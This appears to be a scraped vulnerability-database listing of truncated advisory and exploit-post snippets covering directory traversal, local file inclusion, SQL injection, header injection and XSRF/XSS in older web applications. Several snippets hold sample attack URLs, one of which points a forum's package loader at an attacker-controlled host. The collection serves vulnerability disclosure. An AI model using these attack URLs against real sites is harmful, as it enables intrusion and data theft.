CVE-2024-13041

Removed by vendor...

Code injection

Elixir Plug Plug version All contains a Header Injection vulnerability in Connection that can result in Given a cookie value, Headers can be added. This attack appear to be exploitable via Crafting a value to be sent as a cookie. This vulnerability appears to have been fixed in = 1.3.5 or 1.2.5 o...

eWebeditor Directory Traversal

No description provided by source. Application Info: Name: eWebeditor Version: all version Vulnerability Info: Type: Directory Traversal Risk: Medium Vulnerability: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&dviewmode=&dir =./...

Cpanel Image Manager Local File Inclusion

Cpanel Image Manager Local File Include Exploit Author : AnTi SeCuRe TeaM : SauDi ViRuS TeaM Site : WwW.VxX9.Cc Email : [email protected] Version Of App : All Versions Tested on : Cpanel 11 Date : 2010-02-14 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= How To Exploit :...

post Card - catid SQL Injection

post Card - catid SQL Injection post Card catid Remote SQL Injection Vulnerability Author: Hussin X Home : www.iqs3cur1ty.com & www.iq-ty.com MaiL : [email protected] script : http://webbdomain.com/php/postcarden/index2.php script : http://webbdomain.com/php/postcardir/index2.php version : a...

eWebeditor - Directory Traversal

eWebeditor - Directory Traversal Application Info: Name: eWebeditor Version: all version Vulnerability Info: Type: Directory Traversal Risk: Medium Vulnerability: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&dviewmode=&dir =./...

eWebeditor - Directory Traversal

Application Info: Name: eWebeditor Version: all version Vulnerability Info: Type: Directory Traversal Risk: Medium Vulnerability: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&dviewmode=&dir =./...

Simple Machines Forum <= 1.1.7 XSRF/XSS/Package Upload Vuln

No description provided by source. Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the admin link between the SMF to load the file:...

dzoic handshakes sql injection >> index.php on $fname

By :s3rv3rhack3rAli Jasbi From hackerz.ir vendro : dzoic.com version : all risk : high bug : http://Victim/dzoic/index.php?handler=search&action=perform&searchtype=members&fname=Sql...

KISGB <= (tmp_theme) 5.1.1 Local File Inclusion Vulnerability

No description provided by source. KISGB Keep It Simple Guest Book : Local FiLe Include's tmptheme Version : All Versions Download : http://sourceforge.net/project/showfiles.php?groupid=38585 ---------------------------------------------------------- Exploit coded and founded by Cr@zyKing Date:...